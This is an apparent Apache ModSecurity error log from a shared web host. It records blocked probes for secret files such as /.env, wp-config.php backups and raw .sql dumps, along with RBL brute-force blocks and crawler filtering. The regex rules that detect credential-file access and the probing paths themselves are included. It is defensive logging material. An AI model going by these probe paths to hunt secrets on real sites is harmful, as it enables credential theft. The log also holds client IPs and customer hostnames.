[Tue May 26 14:50:08.596539 2026] [security2:error] [pid 648203:tid 648333] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1zwAAAIU"]
[Tue May 26 14:50:08.770440 2026] [security2:error] [pid 648203:tid 648391] [client 45.148.10.95:32264] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/web/.env"] [unique_id "ahVlyLEQDDtxJNiDrdT13wAAAL8"]
[Tue May 26 14:50:08.822326 2026] [security2:error] [pid 648203:tid 648447] [client 45.148.10.95:32246] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT13gAAAPc"]
[Tue May 26 14:50:08.878312 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:32258] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT14AAAAKU"]
[Tue May 26 14:50:08.991274 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT14wAAAO4"]
[Tue May 26 14:50:09.000985 2026] [security2:error] [pid 648203:tid 648346] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT10gAAAJI"]
[Tue May 26 14:50:09.215025 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlybEQDDtxJNiDrdT15gAAANk"]
[Tue May 26 14:50:09.435747 2026] [security2:error] [pid 648203:tid 648429] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlybEQDDtxJNiDrdT1-AAAAOU"]
[Tue May 26 14:50:09.577746 2026] [security2:error] [pid 648203:tid 648418] [client 45.3.52.145:12703] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1zgAAANo"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:50:09.905375 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:47834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlybEQDDtxJNiDrdT1_gAAAK4"]
[Tue May 26 14:50:09.976323 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:32134] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlybEQDDtxJNiDrdT2AgAAAOk"]
[Tue May 26 14:50:10.617699 2026] [security2:error] [pid 648203:tid 648379] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlyrEQDDtxJNiDrdT2DgAAALM"]
[Tue May 26 14:50:10.815404 2026] [security2:error] [pid 648203:tid 648351] [client 45.148.10.95:32056] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.bak"] [unique_id "ahVlyrEQDDtxJNiDrdT2HwAAAJc"]
[Tue May 26 14:50:10.817345 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:32118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php"] [unique_id "ahVlyrEQDDtxJNiDrdT2IQAAAO4"]
[Tue May 26 14:50:10.872585 2026] [security2:error] [pid 648203:tid 648435] [client 45.148.10.95:32110] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.new"] [unique_id "ahVlyrEQDDtxJNiDrdT2IgAAAOs"]
[Tue May 26 14:50:10.877497 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyrEQDDtxJNiDrdT2IAAAAPA"]
[Tue May 26 14:50:10.942686 2026] [security2:error] [pid 648203:tid 648409] [client 45.148.10.95:32148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVlyrEQDDtxJNiDrdT2JgAAANE"]
[Tue May 26 14:50:10.978633 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:32184] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyrEQDDtxJNiDrdT2JQAAAPU"]
[Tue May 26 14:50:11.405974 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVly7EQDDtxJNiDrdT2MQAAAMg"]
[Tue May 26 14:50:11.499732 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.95:47834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVly7EQDDtxJNiDrdT2MgAAAL4"]
[Tue May 26 14:50:11.559351 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:47848] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/website/.env"] [unique_id "ahVly7EQDDtxJNiDrdT2NAAAAJ0"]
[Tue May 26 14:50:11.635774 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVly7EQDDtxJNiDrdT2NgAAAK0"]
[Tue May 26 14:50:11.775280 2026] [security2:error] [pid 648203:tid 648366] [client 209.50.180.130:44729] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlyrEQDDtxJNiDrdT2FgAAAKY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:50:11.802741 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:32264] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.old"] [unique_id "ahVly7EQDDtxJNiDrdT2PQAAAJ4"]
[Tue May 26 14:50:11.897674 2026] [security2:error] [pid 648203:tid 648375] [client 45.148.10.95:32258] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVly7EQDDtxJNiDrdT2RwAAAK8"]
[Tue May 26 14:50:11.931457 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:32246] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVly7EQDDtxJNiDrdT2SAAAALc"]
[Tue May 26 14:50:11.964366 2026] [security2:error] [pid 648203:tid 648376] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVly7EQDDtxJNiDrdT2SwAAALA"]
[Tue May 26 14:50:12.752009 2026] [security2:error] [pid 648203:tid 648223] [remote 209.42.18.223:38106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVlzLEQDDtxJNiDrdT2XAAAyRM"]
[Tue May 26 14:50:12.809682 2026] [security2:error] [pid 648203:tid 648367] [client 74.249.173.207:2575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/404.php"] [unique_id "ahVlzLEQDDtxJNiDrdT2YAAAAKc"]
[Tue May 26 14:50:12.973806 2026] [security2:error] [pid 648203:tid 648455] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlzLEQDDtxJNiDrdT2WwAAAP8"]
[Tue May 26 14:50:13.977838 2026] [security2:error] [pid 648203:tid 648449] [client 209.50.170.56:64711] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlzLEQDDtxJNiDrdT2YQAAAPk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:50:14.365284 2026] [security2:error] [pid 648203:tid 648378] [client 195.178.110.34:60574] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/website/.env"] [unique_id "ahVlzrEQDDtxJNiDrdT2iQAAALI"]
[Tue May 26 14:50:15.105591 2026] [security2:error] [pid 648203:tid 648439] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlzrEQDDtxJNiDrdT2mwAAAO8"]
[Tue May 26 14:50:15.168019 2026] [security2:error] [pid 648203:tid 648401] [client 65.111.0.69:64901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.0.111.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlz7EQDDtxJNiDrdT2qQAAAMk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:50:15.669819 2026] [security2:error] [pid 648203:tid 648234] [remote 45.250.255.226:44628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVlz7EQDDtxJNiDrdT2tgAAhh4"]
[Tue May 26 14:50:16.611299 2026] [security2:error] [pid 648203:tid 648340] [client 74.249.173.207:2585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-admin/user/index.php"] [unique_id "ahVl0LEQDDtxJNiDrdT2ywAAAIw"]
[Tue May 26 14:50:17.042117 2026] [security2:error] [pid 648203:tid 648430] [client 114.119.139.1:20571] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVl0bEQDDtxJNiDrdT21gAAAOY"], referer: http://glorodavionics.com/index.php?route=product/product&path=72_79_130&product_id=179
[Tue May 26 14:50:18.108557 2026] [security2:error] [pid 648203:tid 648351] [client 196.244.71.212:57781] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVl0bEQDDtxJNiDrdT24gAAAJc"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 14:50:18.349755 2026] [security2:error] [pid 648203:tid 648431] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl0bEQDDtxJNiDrdT28QAAAOc"]
[Tue May 26 14:50:19.704985 2026] [security2:error] [pid 648203:tid 648402] [client 172.225.181.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVl07EQDDtxJNiDrdT3HAAAAMo"]
[Tue May 26 14:50:20.010962 2026] [security2:error] [pid 648203:tid 648387] [client 195.178.110.34:60588] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/website/.env"] [unique_id "ahVl1LEQDDtxJNiDrdT3MAAAALs"]
[Tue May 26 14:50:20.173746 2026] [security2:error] [pid 648203:tid 648450] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl07EQDDtxJNiDrdT3KQAAAPo"]
[Tue May 26 14:50:20.424387 2026] [core:error] [pid 648203:tid 648381] [client 198.235.24.32:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:50:20.424404 2026] [core:error] [pid 648203:tid 648381] [client 198.235.24.32:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:50:20.574979 2026] [security2:error] [pid 648203:tid 648339] [client 185.191.171.14:18270] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/8/"] [unique_id "ahVl1LEQDDtxJNiDrdT3QAAAAIs"]
[Tue May 26 14:50:20.575087 2026] [security2:error] [pid 648203:tid 648339] [client 185.191.171.14:18270] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/8/"] [unique_id "ahVl1LEQDDtxJNiDrdT3QAAAAIs"]
[Tue May 26 14:50:21.330595 2026] [security2:error] [pid 648203:tid 648389] [client 114.119.134.95:48249] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/prespontaneousffcd/addffd1898036.shtml"] [unique_id "ahVl1bEQDDtxJNiDrdT3WAAAAL0"], referer: http://ghanemgh.com/prespontaneousffcd/addffd1898036.shtml
[Tue May 26 14:50:21.437487 2026] [security2:error] [pid 648203:tid 648419] [client 114.119.129.237:63717] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.athelstan.org.in"] [uri "/images/BharatVEpur.jpg"] [unique_id "ahVl1bEQDDtxJNiDrdT3XAAAANs"], referer: https://www.athelstan.org.in/images/BharatVEpur.jpg
[Tue May 26 14:50:22.449843 2026] [security2:error] [pid 648203:tid 648406] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl1rEQDDtxJNiDrdT3cAAAAM4"]
[Tue May 26 14:50:23.441578 2026] [autoindex:error] [pid 648203:tid 648451] [client 198.235.24.176:62636] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:50:24.872895 2026] [security2:error] [pid 648203:tid 648406] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl2LEQDDtxJNiDrdT3tQAAAM4"]
[Tue May 26 14:50:26.759849 2026] [security2:error] [pid 648203:tid 648442] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl2rEQDDtxJNiDrdT39AAAAPI"]
[Tue May 26 14:50:27.381014 2026] [security2:error] [pid 648203:tid 648373] [client 113.170.104.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl2rEQDDtxJNiDrdT4AwAAAK0"]
[Tue May 26 14:50:27.891037 2026] [security2:error] [pid 648203:tid 648447] [client 195.178.110.34:51272] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/development/.env"] [unique_id "ahVl27EQDDtxJNiDrdT4GwAAAPc"]
[Tue May 26 14:50:28.480371 2026] [security2:error] [pid 648203:tid 648436] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl3LEQDDtxJNiDrdT4IwAAAOw"]
[Tue May 26 14:50:28.935855 2026] [security2:error] [pid 648203:tid 648273] [remote 142.93.171.165:57466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.171.93.142.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVl3LEQDDtxJNiDrdT4MQAA3kU"]
[Tue May 26 14:50:31.579535 2026] [security2:error] [pid 648203:tid 648377] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl37EQDDtxJNiDrdT4dQAAALE"]
[Tue May 26 14:50:33.220273 2026] [security2:error] [pid 648203:tid 648383] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl4LEQDDtxJNiDrdT4oAAAALc"]
[Tue May 26 14:50:35.375620 2026] [security2:error] [pid 648203:tid 648274] [remote 103.11.102.106:37740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVl47EQDDtxJNiDrdT4ywABA0Y"]
